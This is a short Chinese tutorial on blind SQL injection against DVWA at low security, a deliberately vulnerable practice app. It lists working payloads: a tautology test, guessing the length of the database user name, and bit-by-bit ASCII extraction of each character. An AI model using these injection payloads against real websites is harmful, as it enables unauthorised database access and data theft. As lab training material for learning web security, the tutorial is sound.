首页 > 代码库 > low security dvwa--SQL Injection(Blind)
low security dvwa--SQL Injection(Blind)
1.输入单引号,结果如下:
2.输入永真式
1‘ and 1=1; --
结果如下:
多次测试,如果输入的条件为假,就会返回1中的结果,为真则返回2中的结果,由此说明这属于SQL盲注。
3.猜解用户名长度
构造下面的SQL语句:
1‘ and length(user())=1; --
从1开始,逐渐加1,直到页面的返回结果是"User ID exists in the database",这时我们就得到了用户名的长度。在我的实验过程中,这个长度是14。
4.猜解用户名
构造下面的SQL语句:
1‘ and ASCII(mid(user(),1,1))&128=128;-- 1‘ and ASCII(mid(user(),1,1))&64=64;-- 1‘ and ASCII(mid(user(),1,1))&32=32;-- 1‘ and ASCII(mid(user(),1,1))&16=16;-- 1‘ and ASCII(mid(user(),1,1))&8=8;-- 1‘ and ASCII(mid(user(),1,1))&4=4;-- 1‘ and ASCII(mid(user(),1,1))&2=2;-- 1‘ and ASCII(mid(user(),1,1))&1=1;--
对于用户名中的每个字符,用上面的方法逐位进行确定即可,假如用户名总共有14个字符的话,用这种方法需要进行14*8=112次。
low security dvwa--SQL Injection(Blind)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。